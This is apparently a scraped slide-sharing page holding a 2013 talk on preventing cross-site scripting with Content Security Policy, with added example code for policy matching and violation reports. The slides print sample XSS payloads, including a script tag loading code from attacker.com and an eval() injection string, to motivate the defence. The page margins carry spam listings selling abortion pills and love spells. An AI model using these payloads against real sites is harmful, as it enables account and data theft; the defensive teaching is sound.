Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
masabamasaba
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
masabamasaba
 

Recently uploaded (20)

WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open SourceWSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
WSO2CON 2024 - Freedom First—Unleashing Developer Potential with Open Source
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
 
WSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - KeynoteWSO2Con204 - Hard Rock Presentation - Keynote
WSO2Con204 - Hard Rock Presentation - Keynote
 
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
WSO2CON 2024 - API Management Usage at La Poste and Its Impact on Business an...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
 
WSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security ProgramWSO2CON 2024 - How to Run a Security Program
WSO2CON 2024 - How to Run a Security Program
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
 

Preventing XSS with Content Security Policy

  • 1. 1 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. KSENIA DMITRIEVA Preventing XSS with Content Security Policy (CSP)
  • 2. 2 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Introduction Who am I? • Senior Security Consultant @Cigital • @KseniaDmitrieva • Ballroom dancer
  • 3. 3 | Copyright © 2013, Cigital and/or its affiliates. All rights reserved. | Cigital Confidential Restricted. Content Security Policy (CSP) Agenda Questions to answer today: • Why do we need CSP? • What is CSP? • How is the policy configured and enforced? • How is CSP applied to existing web applications? • What improvements is CSP 1.1 bringing? • More questions?
Slides 4-5: How to Protect from XSS?
[Figure: the three XSS classes, reflected, stored (via the DB) and DOM-based; slide 5 repeats the same figure.]
Slide 6: Ways to Exploit an XSS (injecting inline JavaScript)
Vulnerable server-side JSP code (the request parameter is written into the page without output encoding):
  <%
  String search_word = request.getParameter("s");
  %>
  <p> Search results for (<%= search_word %>)</p>
Malicious request:
  GET http://example.com/index.html?s=<script>alert('xss');</script>
Server response:
  <%
  String search_word = "<script>alert('xss');</script>";
  %>
  <p> Search results for <script>alert('xss');</script></p>
Slide 7: Ways to Exploit an XSS (injecting a third-party JavaScript)
Vulnerable server-side JSP code (same as slide 6):
  <%
  String search_word = request.getParameter("s");
  %>
  <p> Search results for (<%= search_word %>)</p>
Malicious request:
  GET http://example.com/index.html?s=apple<script src="http://attacker.com/parse_page.js"/>
Server response:
  <%
  String search_word = "apple<script src="http://attacker.com/parse_page.js"/>";
  %>
  <p> Search results for apple<script src="http://attacker.com/parse_page.js"/></p>
Slide 8: Ways to Exploit an XSS (injecting into eval())
Vulnerable JavaScript:
  var function_name = "display";
  var user_input = document.getElementById("parameter").value;
  eval(function_name+"('"+user_input+"');");
  Result: display('firstname');
Malicious input:
  user_input="firstname'); alert('xss";
JavaScript result:
  eval("display"+"('"+"firstname'); alert('xss"+"');");
  Result: display('firstname'); alert('xss');
Slide 9: What is Content Security Policy?
CSP defines a list of resource directives:
• script-src
• connect-src
• font-src
• frame-src
• style-src
• img-src
• media-src
• object-src
[Figure: a sample form page (First Name, Last Name, Address, Email, Submit) that embeds a third-party <iframe src="http://attacker.com/hello.htm"></iframe>, an inline <script> block, <script src="https://malicioussites.com/spam.js"/> and <script src="https://jquery.org/libraries/jquery.js"/>.]
Content Security Policy:
• Restricts ad-hoc XSS vectors such as inline scripts, third-party scripts, iframes, CSS, and eval().
• Imposes restrictions on resources based on their origin.
Slide 10: Sample CSP Policies
The policy is sent by the server as an HTTP header:
  Content-Security-Policy: script-src 'self' https://apis.google.com
Any malicious inline scripts or scripts hosted elsewhere will not be executed.

Can a page with the following policy load an image from http://www.bbc.com/?
  Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *
Yes: img-src * is the directive that governs images, and it allows any origin.

Can a page with the following policy load a script from http://attacker.com?
  Content-Security-Policy: default-src 'self' *.mydomain.com; img-src *; font-src https://themes.googleusercontent.com
No: there is no script-src, so scripts fall back to default-src, which allows only the page's own origin and subdomains of mydomain.com (*.mydomain.com matches subdomains only, not mydomain.com itself).

Can a page with the following policy load a CSS from http://wordpress.org?
  Content-Security-Policy: script-src 'self'; frame-src 'none'; object-src 'none'
Yes: the policy sets neither style-src nor default-src, so stylesheets are unrestricted.
Configure frame-src and object-src as well as script-src, since XSS may be executed by injecting malicious iframes or plugins.
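The three questions above can be answered mechanically once the source-list matching rules are written down. The following is an added example, not code from the slides: a small matcher for the CSP 1.0 source syntax the sample policies use ('self', 'none', '*', scheme sources such as https:, host sources with an optional scheme, *.host wildcards and :port / :* ports), with the default-src fallback. The page origin http://www.mydomain.com/ is an assumption, since the slide does not say where the page is served from; paths in host sources and the later special cases for data:/blob: under '*' are left out.

```javascript
// Added example (not from the slides): minimal CSP 1.0 source-list matching.
// Answers: may a page at pageOrigin load a resource governed by `directive`
// from resourceUrl under the policy `header`?

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// "default-src 'self' *.mydomain.com; img-src *" -> { 'default-src': [...], 'img-src': ['*'] }
function parsePolicy(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

function portOf(u) {
  return u.port || DEFAULT_PORTS[u.protocol] || '';
}

// Host patterns: exact host, "*" (any host) or "*.example.com" (subdomains only).
function hostMatches(pattern, host) {
  pattern = pattern.toLowerCase();
  host = host.toLowerCase();
  if (pattern === '*') return true;
  if (pattern.startsWith('*.')) {
    const suffix = pattern.slice(1);               // ".example.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return pattern === host;
}

function sourceMatches(source, url, page) {
  if (source === "'none'") return false;
  if (source === "'self'") {
    return url.protocol === page.protocol &&
      url.hostname.toLowerCase() === page.hostname.toLowerCase() &&
      portOf(url) === portOf(page);
  }
  // 'unsafe-inline', 'unsafe-eval', 'nonce-...', 'sha256-...' never match a URL.
  if (source.startsWith("'")) return false;
  if (source === '*') return true;
  // Scheme-only source, e.g. "https:" matches every https URL.
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return url.protocol === source.toLowerCase();

  // Host source: [scheme://]host[:port]; a path component is ignored in this example.
  let scheme = null;
  let rest = source;
  const m = rest.match(/^([a-z][a-z0-9+.-]*):\/\/(.*)$/i);
  if (m) { scheme = m[1].toLowerCase() + ':'; rest = m[2]; }
  rest = rest.split('/')[0];
  let hostPart = rest;
  let portPart = null;
  const colon = rest.lastIndexOf(':');
  if (colon !== -1) { hostPart = rest.slice(0, colon); portPart = rest.slice(colon + 1); }

  if (!hostMatches(hostPart, url.hostname)) return false;
  // Without an explicit scheme the source inherits the page's scheme (CSP 1.0 rule).
  const wantScheme = scheme || page.protocol;
  if (url.protocol !== wantScheme) return false;
  // Without an explicit port only the scheme's default port matches; ":*" matches any port.
  if (portPart === null) return portOf(url) === (DEFAULT_PORTS[url.protocol] || '');
  return portPart === '*' || portPart === portOf(url);
}

// Resource directives fall back to default-src; with neither, the load is unrestricted.
function effectiveSources(policy, directive) {
  if (policy[directive]) return policy[directive];
  if (policy['default-src']) return policy['default-src'];
  return null;
}

function isAllowed(header, directive, resourceUrl, pageOrigin) {
  const sources = effectiveSources(parsePolicy(header), directive);
  if (sources === null) return true;
  const url = new URL(resourceUrl);
  const page = new URL(pageOrigin);
  return sources.some(s => sourceMatches(s, url, page));
}

// The slide's three policies; the page origin is assumed for the example.
const PAGE = 'http://www.mydomain.com/';
const P1 = "default-src 'self' *.mydomain.com; img-src *";
const P2 = "default-src 'self' *.mydomain.com; img-src *; font-src https://themes.googleusercontent.com";
const P3 = "script-src 'self'; frame-src 'none'; object-src 'none'";
```

Calling isAllowed(P1, 'img-src', 'http://www.bbc.com/logo.png', PAGE), isAllowed(P2, 'script-src', 'http://attacker.com/x.js', PAGE) and isAllowed(P3, 'style-src', 'http://wordpress.org/style.css', PAGE) gives true, false and true, matching the answers above; the same function shows that P3 blocks every frame, while P1 lets static.mydomain.com but not mydomain.com serve scripts.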
Slide 11: CSP Reporting
Report violations of the policy to the server with the report-uri directive:
  Content-Security-Policy: default-src 'self'; report-uri http://example.com/reporting/parser.php;
Sample reported JSON (POSTed by the browser to the report-uri):
  {
    "csp-report": {
      "document-uri": "http://example.com/page.html",
      "referrer": "http://evil.example.com/",
      "blocked-uri": "http://evil.example.com/evil.js",
      "violated-directive": "script-src 'self' https://apis.google.com",
      "original-policy": "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php"
    }
  }
Different browsers format reports differently!
Slide 12: CSP Reporting and Enforcing
• The Content-Security-Policy header with report-uri enforces the policy and reports violations
• The Content-Security-Policy-Report-Only header reports policy violations but does not enforce the policy:
  Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php
• Use both headers: one to enforce the old policy and another to test out the new policy:
  Content-Security-Policy: default-src 'self' *.google.com;
  Content-Security-Policy-Report-Only: default-src 'self' *.google.com; script-src 'self' https://apis.google.com; frame-src 'self'; report-uri http://example.com/reporting/parser.php
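Running a Report-Only policy is only useful if the reports are turned into policy changes, and slide 11 warns that browsers format them differently. The following is an added example, not code from the slides: a normaliser that accepts the {"csp-report": {...}} wrapper or a bare object, reduces each report to the directive that fired and the origin (or the fact that it was an inline/eval violation), drops reports caused by browser extensions, and aggregates what the policy is missing. The three report bodies are constructed for the example (the first is the slide's sample; the others use the effective-directive field and the "inline" and chrome-extension: blocked-uri values that Chrome sends).

```javascript
// Added example (not from the slides): normalising and aggregating CSP
// violation reports received at a report-uri endpoint.

function normalizeCspReport(body) {
  const parsed = typeof body === 'string' ? JSON.parse(body) : body;
  const rep = parsed['csp-report'] || parsed;    // tolerate both wrappers
  const violated = rep['violated-directive'] || '';
  // Chrome adds effective-directive; otherwise take the directive name from
  // the violated source list: "script-src 'self' https://..." -> "script-src".
  const directive = (rep['effective-directive'] || violated.split(/\s+/)[0] || '').toLowerCase();
  const blocked = rep['blocked-uri'] || '';
  let kind;
  if (blocked === '' || blocked === 'inline' || blocked === 'self' || blocked === 'eval') {
    kind = 'inline';        // no URL to report: inline script/style or eval()
  } else if (/^(chrome|moz|safari)-extension:/.test(blocked)) {
    kind = 'extension';     // injected by a browser extension, not by the page
  } else {
    kind = 'external';
  }
  let origin = null;
  if (kind === 'external') {
    // Browsers may strip cross-origin reports down to a scheme such as "data",
    // which is not a parseable URL; keep the raw value in that case.
    try { origin = new URL(blocked).origin; } catch (e) { origin = blocked; }
  }
  return { document: rep['document-uri'] || '', directive, kind, blockedUri: blocked, origin };
}

// Aggregate many reports into "what would I have to add to the policy?":
// per directive, how many inline violations and which external origins.
function summarizeReports(bodies) {
  const summary = {};
  for (const body of bodies) {
    const n = normalizeCspReport(body);
    if (n.kind === 'extension' || !n.directive) continue;   // noise, not a policy gap
    const entry = summary[n.directive] || (summary[n.directive] = { inline: 0, origins: {} });
    if (n.kind === 'inline') entry.inline += 1;
    else entry.origins[n.origin] = (entry.origins[n.origin] || 0) + 1;
  }
  return summary;
}

// Constructed sample reports: the slide's example plus two Chrome-style variants.
const SAMPLE_REPORTS = [
  JSON.stringify({ 'csp-report': {
    'document-uri': 'http://example.com/page.html',
    'referrer': 'http://evil.example.com/',
    'blocked-uri': 'http://evil.example.com/evil.js',
    'violated-directive': "script-src 'self' https://apis.google.com",
    'original-policy': "default-src 'self'; script-src 'self' https://apis.google.com; report-uri http://example.com/reporting/parser.php"
  } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'http://example.com/page.html',
    'blocked-uri': 'inline',
    'effective-directive': 'script-src',
    'violated-directive': "script-src 'self' https://apis.google.com"
  } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'http://example.com/page.html',
    'blocked-uri': 'chrome-extension://abcdefghijklmnop/content.js',
    'effective-directive': 'script-src',
    'violated-directive': "script-src 'self' https://apis.google.com"
  } })
];
```

summarizeReports(SAMPLE_REPORTS) yields { 'script-src': { inline: 1, origins: { 'http://evil.example.com': 1 } } }: one inline script that has to be externalised (or, under CSP 1.1, given a nonce or hash) and one origin that is either an attack or a missing entry; the extension report is discarded rather than silently widening the policy.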
Slides 13-14: Externalizing JavaScript
Externalize all inline script, inline CSS, event handlers and eval() constructs.
Without CSP (Page.html): an inline script block, a string argument to setTimeout (evaluated like eval()) and inline onload/onclick handlers, none of which run under a policy without 'unsafe-inline' and 'unsafe-eval':
  <!doctype html>
  <html>
  <head>
    <title>My Page</title>
    <script type="text/javascript">
      function repeated() { ... }
      function clickHandler(element) {
        setTimeout("console.log('lapse'); repeated()", 1000);
      }
      function init() { ... }
    </script>
  </head>
  <body onload="init();">
    <button onclick="clickHandler(this)">Click me!</button>
  </body>
  </html>
With CSP (Page.html): no inline script and no inline handlers, only an external file:
  <!doctype html>
  <html>
  <head>
    <title>My Page</title>
    <script src="mypage.js"></script>
  </head>
  <body>
    <button>Click me!</button>
  </body>
  </html>
With CSP (mypage.js): the handlers are attached from the external file and setTimeout receives a function instead of a string:
  function repeated() {...}
  function repeatedTask() {
    console.log('lapse');
    repeated();
  }
  function clickHandler(e) {
    setTimeout(repeatedTask, 1000);
  }
  function init() {...}
  document.addEventListener('DOMContentLoaded', function () {
    document.querySelector('button').addEventListener('click', clickHandler);
    init();
  });
(Slide 14 shows the same "with CSP" Page.html and mypage.js on their own.)
Slide 15: CSP Adoption
http://blog.veracode.com/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/
CSP 1.0 is supported by the following browsers:
• Internet Explorer: partial support, requires the prefixed X-Content-Security-Policy header
• Firefox desktop 23, Firefox for Android 30
• Chrome desktop 25, Chrome for Android 35
• Safari desktop 7, iOS Safari 7
• Opera desktop 22
• Opera Mini: no support
CSP adoption rate is slow. Most of the CSP policies in use rely on the unsafe keywords 'unsafe-eval' and 'unsafe-inline'.
Slide 16: Real World CSP Adoption Examples
Twitter uses CSP on all their services (January 2015).
  Content-Security-Policy: default-src https:; connect-src https:; font-src https: data:; frame-src https: twitter:; frame-ancestors https:; img-src https: data:; media-src https:; object-src https:; script-src 'unsafe-inline' 'unsafe-eval' https:; style-src 'unsafe-inline' https:; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXFVZXO2LGOQ%3D%3D%3D%3D%3D%3D&ro=false;
  Content-Security-Policy: default-src 'self'; connect-src https://caps.twitter.com https://caps-staging.twitter.com https://twitter.com/i/cards/api/ https://cards.twitter.com; font-src https://ton.twimg.com data:; frame-src https://*; frame-ancestors https://*; img-src https://* data:; media-src 'none'; object-src 'self'; script-src https://ton.twimg.com; style-src 'unsafe-inline' https://ton.twimg.com; report-uri https://twitter.com/i/csp_report?a=NVQWGYLXMNQXEZDT&ro=false;
The first policy permits inline and eval()-ed script from any https: origin, so it mostly guards against plaintext http: resources rather than against XSS; the second pins script-src to a single host and is the stricter of the two.
Slide 17: Real World CSP Adoption Examples
Yelp uses CSP on www.yelp.com (January 2015).
  Content-Security-Policy: default-src *; script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net *.atlassolutions.com; style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;
Slide 18: Content Security Policy 1.1
Using 'unsafe-eval' and 'unsafe-inline' is equal to turning the CSP off!
CSP 1.1 (or Level 2) addresses the issue of broken policies with:
• the nonce-source expression
• the hash-source expression
• policies in <meta> tags:
  <meta http-equiv="Content-Security-Policy" content="script-src 'self'">
  (report-uri, frame-ancestors and sandbox are ignored when delivered this way and need the HTTP header.)
CSP 1.1 status: W3C Last Call Working Draft, 03 July 2014
CSP 1.1 is currently partially supported by Firefox 31 and Chrome 30
Slide 19: Nonce Directive
• Add a nonce attribute to every inline script in the page:
  <script nonce="ZDU4eHjBDQ">
    function onButtonClick() …
  </script>
• Add the nonce source to the script-src directive; the syntax is the quoted keyword 'nonce-<value>':
  Content-Security-Policy: script-src 'nonce-ZDU4eHjBDQ' 'self'
• Set a new nonce each time the page is requested. The value must come from a cryptographic random generator and be unguessable: anyone who can predict it can inject an inline script that carries it.
• Do not automatically add a nonce to every JavaScript in the response; a post-processing pass over the output would also tag an injected <script>, which defeats the point.
• Add the nonce to inline JavaScript in the view template.
Slide 20: Hash-source Directive
Will the nonce directive prevent DOM-based XSS in dynamically generated JavaScript? No.
  <script>
    function onButtonClick() …
  </script>
Solution: mark every inline JavaScript with a hash!
• The 'hash-source' expression sends a hash of each inline script in the response
• The browser hashes every inline JavaScript and compares the hashes; a script whose hash is not listed does not run
Hash the script and add a Base64-encoded value to the CSP header:
  Content-Security-Policy: default-src 'self'; script-src 'sha256-MWUyMTJjMTc2MWZjZWQzYmY3ZDE0NGZlYmVmYzFkYmYwOTc2OTVkODFkZmNjNjk3OTFmMWJlYTVmNWJlYThhOA==' 'sha256-Yzg2OWMyMGI2NmZhODU2MjQ0MzBlYWVmYWQ0M2Y1ZTg5NTljNGE3ZThjYTcyYzI5Y2EzYzJlNGYxODU4ZjM1OQ=='
Caveat: the two values above are 88 characters long, which is the Base64 encoding of a hex digest string. The browser computes the Base64 of the raw 32-byte SHA-256 digest (44 characters), so a hash produced by Base64-encoding the hex form never matches. The hash covers the exact text between <script> and </script>, whitespace included; any change to the script, reformatting included, changes the hash.
Slide 21: Q&A
Resources:
• W3C Standard for CSP 1.1: http://www.w3.org/TR/CSP11/
• CSP Reference: http://content-security-policy.com/
• An Introduction to CSP by Mike West: http://www.html5rocks.com/en/tutorials/security/content-security-policy/
• Making CSP Work for You by Mark Goodwin: https://www.youtube.com/watch?v=F7eCP08nacI&t=2h14m16s
• Automatic XSS protection with CSP by Neil Matatall: https://blog.matatall.com/2013/09/automatic-xss-protection-with-csp-no-changes-required/
• Generating Content-Security-Policies, the easy way: http://c0nrad.io/blog/csp.html
Slide 22
@KseniaDmitrieva
kdmitrieva@cigital.com